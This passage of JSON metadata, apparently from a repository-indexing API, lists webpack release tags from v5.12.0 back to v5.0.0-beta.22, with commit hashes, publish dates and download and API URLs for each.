webpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk